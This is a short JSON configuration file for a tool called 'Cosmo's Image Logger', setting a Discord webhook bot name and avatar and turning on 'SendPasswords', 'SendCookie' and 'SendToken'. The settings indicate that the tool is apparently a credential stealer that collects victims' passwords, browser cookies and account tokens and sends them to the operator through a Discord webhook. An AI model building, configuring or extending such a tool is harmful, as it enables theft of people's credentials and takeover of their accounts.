{
    "Title_Configs":[
        {

           "name": "Cosmo",
           "servername": "Image Logger Test",
           "program": "Cosmo's Image Logger"

        }
    ],

    "Webhook_config":[
        {

          "Bot_Name": "Cosmo",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
